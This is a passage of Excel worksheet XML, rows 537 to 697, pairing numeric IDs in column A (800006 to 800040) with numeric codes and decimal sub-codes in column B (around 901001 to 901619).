      <c r="B537" s="3">
        <v>901552.00300000003</v>
      </c>
    </row>
    <row r="538" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A538" s="3">
        <v>800006</v>
      </c>
      <c r="B538" s="3">
        <v>901552.00399999996</v>
      </c>
    </row>
    <row r="539" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A539" s="3">
        <v>800006</v>
      </c>
      <c r="B539" s="3">
        <v>901552.005</v>
      </c>
    </row>
    <row r="540" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A540" s="3">
        <v>800006</v>
      </c>
      <c r="B540" s="3">
        <v>901552.00600000005</v>
      </c>
    </row>
    <row r="541" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A541" s="3">
        <v>800006</v>
      </c>
      <c r="B541" s="3">
        <v>901552.00699999998</v>
      </c>
    </row>
    <row r="542" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A542" s="3">
        <v>800007</v>
      </c>
      <c r="B542" s="3">
        <v>901087</v>
      </c>
    </row>
    <row r="543" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A543" s="3">
        <v>800007</v>
      </c>
      <c r="B543" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="544" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A544" s="3">
        <v>800007</v>
      </c>
      <c r="B544" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="545" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A545" s="3">
        <v>800007</v>
      </c>
      <c r="B545" s="3">
        <v>901087.00300000003</v>
      </c>
    </row>
    <row r="546" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A546" s="3">
        <v>800007</v>
      </c>
      <c r="B546" s="3">
        <v>901087.00399999996</v>
      </c>
    </row>
    <row r="547" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A547" s="3">
        <v>800007</v>
      </c>
      <c r="B547" s="3">
        <v>901010</v>
      </c>
    </row>
    <row r="548" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A548" s="3">
        <v>800007</v>
      </c>
      <c r="B548" s="3">
        <v>901217</v>
      </c>
    </row>
    <row r="549" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A549" s="3">
        <v>800007</v>
      </c>
      <c r="B549" s="3">
        <v>901580</v>
      </c>
    </row>
    <row r="550" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A550" s="3">
        <v>800007</v>
      </c>
      <c r="B550" s="3">
        <v>901538</v>
      </c>
    </row>
    <row r="551" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A551" s="3">
        <v>800007</v>
      </c>
      <c r="B551" s="3">
        <v>901526</v>
      </c>
    </row>
    <row r="552" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A552" s="3">
        <v>800007</v>
      </c>
      <c r="B552" s="3">
        <v>901619</v>
      </c>
    </row>
    <row r="553" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A553" s="3">
        <v>800007</v>
      </c>
      <c r="B553" s="3">
        <v>901613</v>
      </c>
    </row>
    <row r="554" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A554" s="3">
        <v>800007</v>
      </c>
      <c r="B554" s="3">
        <v>901482</v>
      </c>
    </row>
    <row r="555" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A555" s="3">
        <v>800007</v>
      </c>
      <c r="B555" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="556" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A556" s="3">
        <v>800007</v>
      </c>
      <c r="B556" s="3">
        <v>901615</v>
      </c>
    </row>
    <row r="557" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A557" s="3">
        <v>800007</v>
      </c>
      <c r="B557" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="558" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A558" s="3">
        <v>800007</v>
      </c>
      <c r="B558" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="559" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A559" s="3">
        <v>800007</v>
      </c>
      <c r="B559" s="3">
        <v>901040</v>
      </c>
    </row>
    <row r="560" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A560" s="3">
        <v>800007</v>
      </c>
      <c r="B560" s="3">
        <v>901201</v>
      </c>
    </row>
    <row r="561" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A561" s="3">
        <v>800007</v>
      </c>
      <c r="B561" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="562" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A562" s="3">
        <v>800007</v>
      </c>
      <c r="B562" s="3">
        <v>901069</v>
      </c>
    </row>
    <row r="563" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A563" s="3">
        <v>800007</v>
      </c>
      <c r="B563" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="564" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A564" s="3">
        <v>800007</v>
      </c>
      <c r="B564" s="3">
        <v>901069.00199999998</v>
      </c>
    </row>
    <row r="565" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A565" s="3">
        <v>800007</v>
      </c>
      <c r="B565" s="3">
        <v>901069.00300000003</v>
      </c>
    </row>
    <row r="566" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A566" s="3">
        <v>800007</v>
      </c>
      <c r="B566" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="567" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A567" s="3">
        <v>800007</v>
      </c>
      <c r="B567" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="568" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A568" s="3">
        <v>800007</v>
      </c>
      <c r="B568" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="569" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A569" s="3">
        <v>800007</v>
      </c>
      <c r="B569" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="570" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A570" s="3">
        <v>800007</v>
      </c>
      <c r="B570" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="571" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A571" s="3">
        <v>800007</v>
      </c>
      <c r="B571" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="572" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A572" s="3">
        <v>800007</v>
      </c>
      <c r="B572" s="3">
        <v>901614</v>
      </c>
    </row>
    <row r="573" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A573" s="3">
        <v>800007</v>
      </c>
      <c r="B573" s="3">
        <v>901614.00100000005</v>
      </c>
    </row>
    <row r="574" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A574" s="3">
        <v>800007</v>
      </c>
      <c r="B574" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="575" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A575" s="3">
        <v>800007</v>
      </c>
      <c r="B575" s="3">
        <v>901016.00100000005</v>
      </c>
    </row>
    <row r="576" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A576" s="3">
        <v>800007</v>
      </c>
      <c r="B576" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="577" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A577" s="3">
        <v>800007</v>
      </c>
      <c r="B577" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="578" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A578" s="3">
        <v>800007</v>
      </c>
      <c r="B578" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="579" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A579" s="3">
        <v>800007</v>
      </c>
      <c r="B579" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="580" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A580" s="3">
        <v>800007</v>
      </c>
      <c r="B580" s="3">
        <v>901497</v>
      </c>
    </row>
    <row r="581" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A581" s="3">
        <v>800007</v>
      </c>
      <c r="B581" s="3">
        <v>901497.00100000005</v>
      </c>
    </row>
    <row r="582" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A582" s="3">
        <v>800007</v>
      </c>
      <c r="B582" s="3">
        <v>901497.00199999998</v>
      </c>
    </row>
    <row r="583" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A583" s="3">
        <v>800007</v>
      </c>
      <c r="B583" s="3">
        <v>901497.00300000003</v>
      </c>
    </row>
    <row r="584" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A584" s="3">
        <v>800008</v>
      </c>
      <c r="B584" s="3">
        <v>901210</v>
      </c>
    </row>
    <row r="585" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A585" s="3">
        <v>800008</v>
      </c>
      <c r="B585" s="3">
        <v>901534</v>
      </c>
    </row>
    <row r="586" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A586" s="3">
        <v>800008</v>
      </c>
      <c r="B586" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="587" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A587" s="3">
        <v>800008</v>
      </c>
      <c r="B587" s="3">
        <v>901563</v>
      </c>
    </row>
    <row r="588" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A588" s="3">
        <v>800008</v>
      </c>
      <c r="B588" s="3">
        <v>901563.00100000005</v>
      </c>
    </row>
    <row r="589" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A589" s="3">
        <v>800008</v>
      </c>
      <c r="B589" s="3">
        <v>901563.00199999998</v>
      </c>
    </row>
    <row r="590" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A590" s="3">
        <v>800008</v>
      </c>
      <c r="B590" s="3">
        <v>901021</v>
      </c>
    </row>
    <row r="591" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A591" s="3">
        <v>800008</v>
      </c>
      <c r="B591" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="592" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A592" s="3">
        <v>800008</v>
      </c>
      <c r="B592" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="593" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A593" s="3">
        <v>800008</v>
      </c>
      <c r="B593" s="3">
        <v>901021.00300000003</v>
      </c>
    </row>
    <row r="594" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A594" s="3">
        <v>800008</v>
      </c>
      <c r="B594" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="595" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A595" s="3">
        <v>800008</v>
      </c>
      <c r="B595" s="3">
        <v>901021.005</v>
      </c>
    </row>
    <row r="596" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A596" s="3">
        <v>800008</v>
      </c>
      <c r="B596" s="3">
        <v>901021.00600000005</v>
      </c>
    </row>
    <row r="597" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A597" s="3">
        <v>800008</v>
      </c>
      <c r="B597" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="598" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A598" s="3">
        <v>800008</v>
      </c>
      <c r="B598" s="3">
        <v>901072</v>
      </c>
    </row>
    <row r="599" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A599" s="3">
        <v>800008</v>
      </c>
      <c r="B599" s="3">
        <v>901080</v>
      </c>
    </row>
    <row r="600" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A600" s="3">
        <v>800008</v>
      </c>
      <c r="B600" s="3">
        <v>901550</v>
      </c>
    </row>
    <row r="601" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A601" s="3">
        <v>800008</v>
      </c>
      <c r="B601" s="3">
        <v>901550.00100000005</v>
      </c>
    </row>
    <row r="602" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A602" s="3">
        <v>800008</v>
      </c>
      <c r="B602" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="603" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A603" s="3">
        <v>800008</v>
      </c>
      <c r="B603" s="3">
        <v>901550.00300000003</v>
      </c>
    </row>
    <row r="604" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A604" s="3">
        <v>800008</v>
      </c>
      <c r="B604" s="3">
        <v>901550.00399999996</v>
      </c>
    </row>
    <row r="605" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A605" s="3">
        <v>800009</v>
      </c>
      <c r="B605" s="3">
        <v>901557</v>
      </c>
    </row>
    <row r="606" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A606" s="3">
        <v>800009</v>
      </c>
      <c r="B606" s="3">
        <v>901557.00100000005</v>
      </c>
    </row>
    <row r="607" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A607" s="3">
        <v>800009</v>
      </c>
      <c r="B607" s="3">
        <v>901557.00199999998</v>
      </c>
    </row>
    <row r="608" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A608" s="3">
        <v>800009</v>
      </c>
      <c r="B608" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="609" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A609" s="3">
        <v>800009</v>
      </c>
      <c r="B609" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="610" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A610" s="3">
        <v>800009</v>
      </c>
      <c r="B610" s="3">
        <v>901560.00199999998</v>
      </c>
    </row>
    <row r="611" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A611" s="3">
        <v>800009</v>
      </c>
      <c r="B611" s="3">
        <v>901560.00300000003</v>
      </c>
    </row>
    <row r="612" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A612" s="3">
        <v>800009</v>
      </c>
      <c r="B612" s="3">
        <v>901123</v>
      </c>
    </row>
    <row r="613" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A613" s="3">
        <v>800009</v>
      </c>
      <c r="B613" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="614" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A614" s="3">
        <v>800009</v>
      </c>
      <c r="B614" s="3">
        <v>901185</v>
      </c>
    </row>
    <row r="615" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A615" s="3">
        <v>800009</v>
      </c>
      <c r="B615" s="3">
        <v>901115</v>
      </c>
    </row>
    <row r="616" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A616" s="3">
        <v>800009</v>
      </c>
      <c r="B616" s="3">
        <v>901530</v>
      </c>
    </row>
    <row r="617" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A617" s="3">
        <v>800009</v>
      </c>
      <c r="B617" s="3">
        <v>901602</v>
      </c>
    </row>
    <row r="618" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A618" s="3">
        <v>800009</v>
      </c>
      <c r="B618" s="3">
        <v>901602.00100000005</v>
      </c>
    </row>
    <row r="619" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A619" s="3">
        <v>800009</v>
      </c>
      <c r="B619" s="3">
        <v>901602.00199999998</v>
      </c>
    </row>
    <row r="620" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A620" s="3">
        <v>800009</v>
      </c>
      <c r="B620" s="3">
        <v>901213</v>
      </c>
    </row>
    <row r="621" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A621" s="3">
        <v>800009</v>
      </c>
      <c r="B621" s="3">
        <v>901213.00100000005</v>
      </c>
    </row>
    <row r="622" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A622" s="3">
        <v>800009</v>
      </c>
      <c r="B622" s="3">
        <v>901213.00199999998</v>
      </c>
    </row>
    <row r="623" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A623" s="3">
        <v>800009</v>
      </c>
      <c r="B623" s="3">
        <v>901213.00300000003</v>
      </c>
    </row>
    <row r="624" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A624" s="3">
        <v>800009</v>
      </c>
      <c r="B624" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="625" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A625" s="3">
        <v>800009</v>
      </c>
      <c r="B625" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="626" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A626" s="3">
        <v>800009</v>
      </c>
      <c r="B626" s="3">
        <v>901025</v>
      </c>
    </row>
    <row r="627" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A627" s="3">
        <v>800009</v>
      </c>
      <c r="B627" s="3">
        <v>901074</v>
      </c>
    </row>
    <row r="628" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A628" s="3">
        <v>800009</v>
      </c>
      <c r="B628" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="629" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A629" s="3">
        <v>800009</v>
      </c>
      <c r="B629" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="630" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A630" s="3">
        <v>800009</v>
      </c>
      <c r="B630" s="3">
        <v>901114</v>
      </c>
    </row>
    <row r="631" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A631" s="3">
        <v>800009</v>
      </c>
      <c r="B631" s="3">
        <v>901114.00100000005</v>
      </c>
    </row>
    <row r="632" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A632" s="3">
        <v>800009</v>
      </c>
      <c r="B632" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="633" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A633" s="3">
        <v>800009</v>
      </c>
      <c r="B633" s="3">
        <v>901114.00300000003</v>
      </c>
    </row>
    <row r="634" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A634" s="3">
        <v>800009</v>
      </c>
      <c r="B634" s="3">
        <v>901056</v>
      </c>
    </row>
    <row r="635" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A635" s="3">
        <v>800009</v>
      </c>
      <c r="B635" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="636" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A636" s="3">
        <v>800009</v>
      </c>
      <c r="B636" s="3">
        <v>901056.00199999998</v>
      </c>
    </row>
    <row r="637" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A637" s="3">
        <v>800009</v>
      </c>
      <c r="B637" s="3">
        <v>901056.00300000003</v>
      </c>
    </row>
    <row r="638" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A638" s="3">
        <v>800009</v>
      </c>
      <c r="B638" s="3">
        <v>901056.00399999996</v>
      </c>
    </row>
    <row r="639" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A639" s="3">
        <v>800009</v>
      </c>
      <c r="B639" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="640" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A640" s="3">
        <v>800009</v>
      </c>
      <c r="B640" s="3">
        <v>901125</v>
      </c>
    </row>
    <row r="641" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A641" s="3">
        <v>800011</v>
      </c>
      <c r="B641" s="3">
        <v>901071</v>
      </c>
    </row>
    <row r="642" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A642" s="3">
        <v>800011</v>
      </c>
      <c r="B642" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="643" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A643" s="3">
        <v>800011</v>
      </c>
      <c r="B643" s="3">
        <v>901071.00199999998</v>
      </c>
    </row>
    <row r="644" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A644" s="3">
        <v>800011</v>
      </c>
      <c r="B644" s="3">
        <v>901071.00300000003</v>
      </c>
    </row>
    <row r="645" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A645" s="3">
        <v>800011</v>
      </c>
      <c r="B645" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="646" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A646" s="3">
        <v>800011</v>
      </c>
      <c r="B646" s="3">
        <v>901092</v>
      </c>
    </row>
    <row r="647" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A647" s="3">
        <v>800011</v>
      </c>
      <c r="B647" s="3">
        <v>901132</v>
      </c>
    </row>
    <row r="648" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A648" s="3">
        <v>800011</v>
      </c>
      <c r="B648" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="649" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A649" s="3">
        <v>800011</v>
      </c>
      <c r="B649" s="3">
        <v>901132.00199999998</v>
      </c>
    </row>
    <row r="650" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A650" s="3">
        <v>800011</v>
      </c>
      <c r="B650" s="3">
        <v>901001</v>
      </c>
    </row>
    <row r="651" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A651" s="3">
        <v>800011</v>
      </c>
      <c r="B651" s="3">
        <v>901001.00100000005</v>
      </c>
    </row>
    <row r="652" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A652" s="3">
        <v>800011</v>
      </c>
      <c r="B652" s="3">
        <v>901001.00199999998</v>
      </c>
    </row>
    <row r="653" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A653" s="3">
        <v>800011</v>
      </c>
      <c r="B653" s="3">
        <v>901001.00300000003</v>
      </c>
    </row>
    <row r="654" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A654" s="3">
        <v>800011</v>
      </c>
      <c r="B654" s="3">
        <v>901568</v>
      </c>
    </row>
    <row r="655" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A655" s="3">
        <v>800011</v>
      </c>
      <c r="B655" s="3">
        <v>901568.00100000005</v>
      </c>
    </row>
    <row r="656" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A656" s="3">
        <v>800011</v>
      </c>
      <c r="B656" s="3">
        <v>901568.00199999998</v>
      </c>
    </row>
    <row r="657" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A657" s="3">
        <v>800011</v>
      </c>
      <c r="B657" s="3">
        <v>901568.00300000003</v>
      </c>
    </row>
    <row r="658" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A658" s="3">
        <v>800011</v>
      </c>
      <c r="B658" s="3">
        <v>901573</v>
      </c>
    </row>
    <row r="659" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A659" s="3">
        <v>800011</v>
      </c>
      <c r="B659" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="660" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A660" s="3">
        <v>800011</v>
      </c>
      <c r="B660" s="3">
        <v>901573.00199999998</v>
      </c>
    </row>
    <row r="661" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A661" s="3">
        <v>800011</v>
      </c>
      <c r="B661" s="3">
        <v>901008</v>
      </c>
    </row>
    <row r="662" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A662" s="3">
        <v>800011</v>
      </c>
      <c r="B662" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="663" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A663" s="3">
        <v>800011</v>
      </c>
      <c r="B663" s="3">
        <v>901104</v>
      </c>
    </row>
    <row r="664" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A664" s="3">
        <v>800011</v>
      </c>
      <c r="B664" s="3">
        <v>901095</v>
      </c>
    </row>
    <row r="665" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A665" s="3">
        <v>800011</v>
      </c>
      <c r="B665" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="666" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A666" s="3">
        <v>800011</v>
      </c>
      <c r="B666" s="3">
        <v>901572</v>
      </c>
    </row>
    <row r="667" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A667" s="3">
        <v>800011</v>
      </c>
      <c r="B667" s="3">
        <v>901090</v>
      </c>
    </row>
    <row r="668" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A668" s="3">
        <v>800011</v>
      </c>
      <c r="B668" s="3">
        <v>901090.00100000005</v>
      </c>
    </row>
    <row r="669" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A669" s="3">
        <v>800011</v>
      </c>
      <c r="B669" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="670" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A670" s="3">
        <v>800011</v>
      </c>
      <c r="B670" s="3">
        <v>901090.00300000003</v>
      </c>
    </row>
    <row r="671" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A671" s="3">
        <v>800011</v>
      </c>
      <c r="B671" s="3">
        <v>901090.00399999996</v>
      </c>
    </row>
    <row r="672" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A672" s="3">
        <v>800011</v>
      </c>
      <c r="B672" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="673" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A673" s="3">
        <v>800011</v>
      </c>
      <c r="B673" s="3">
        <v>901205</v>
      </c>
    </row>
    <row r="674" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A674" s="3">
        <v>800011</v>
      </c>
      <c r="B674" s="3">
        <v>901205.00100000005</v>
      </c>
    </row>
    <row r="675" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A675" s="3">
        <v>800011</v>
      </c>
      <c r="B675" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="676" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A676" s="3">
        <v>800011</v>
      </c>
      <c r="B676" s="3">
        <v>901102.00100000005</v>
      </c>
    </row>
    <row r="677" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A677" s="3">
        <v>800011</v>
      </c>
      <c r="B677" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="678" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A678" s="3">
        <v>800011</v>
      </c>
      <c r="B678" s="3">
        <v>901102.00300000003</v>
      </c>
    </row>
    <row r="679" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A679" s="3">
        <v>800010</v>
      </c>
      <c r="B679" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="680" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A680" s="3">
        <v>800010</v>
      </c>
      <c r="B680" s="3">
        <v>901020.00100000005</v>
      </c>
    </row>
    <row r="681" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A681" s="3">
        <v>800010</v>
      </c>
      <c r="B681" s="3">
        <v>901030</v>
      </c>
    </row>
    <row r="682" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A682" s="3">
        <v>800010</v>
      </c>
      <c r="B682" s="3">
        <v>901048</v>
      </c>
    </row>
    <row r="683" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A683" s="3">
        <v>800010</v>
      </c>
      <c r="B683" s="3">
        <v>901048.00100000005</v>
      </c>
    </row>
    <row r="684" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A684" s="3">
        <v>800010</v>
      </c>
      <c r="B684" s="3">
        <v>901048.00199999998</v>
      </c>
    </row>
    <row r="685" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A685" s="3">
        <v>800010</v>
      </c>
      <c r="B685" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="686" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A686" s="3">
        <v>800010</v>
      </c>
      <c r="B686" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="687" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A687" s="3">
        <v>800010</v>
      </c>
      <c r="B687" s="3">
        <v>901011</v>
      </c>
    </row>
    <row r="688" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A688" s="3">
        <v>800010</v>
      </c>
      <c r="B688" s="3">
        <v>901011.00100000005</v>
      </c>
    </row>
    <row r="689" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A689" s="3">
        <v>800010</v>
      </c>
      <c r="B689" s="3">
        <v>901052</v>
      </c>
    </row>
    <row r="690" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A690" s="3">
        <v>800010</v>
      </c>
      <c r="B690" s="3">
        <v>901052.00100000005</v>
      </c>
    </row>
    <row r="691" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A691" s="3">
        <v>800010</v>
      </c>
      <c r="B691" s="3">
        <v>901567</v>
      </c>
    </row>
    <row r="692" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A692" s="3">
        <v>800010</v>
      </c>
      <c r="B692" s="3">
        <v>901567.00100000005</v>
      </c>
    </row>
    <row r="693" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A693" s="3">
        <v>800010</v>
      </c>
      <c r="B693" s="3">
        <v>901567.00199999998</v>
      </c>
    </row>
    <row r="694" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A694" s="3">
        <v>800010</v>
      </c>
      <c r="B694" s="3">
        <v>901029</v>
      </c>
    </row>
    <row r="695" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A695" s="3">
        <v>800010</v>
      </c>
      <c r="B695" s="3">
        <v>901537</v>
      </c>
    </row>
    <row r="696" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A696" s="3">
        <v>800040</v>
      </c>
      <c r="B696" s="3">
        <v>901531</v>
      </c>
    </row>
    <row r="697" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A697" s="3">
        <v>800040</v>
      </c>
      <c r="B697" s="3">
        <v>901485</v>
      </c>
    </row>
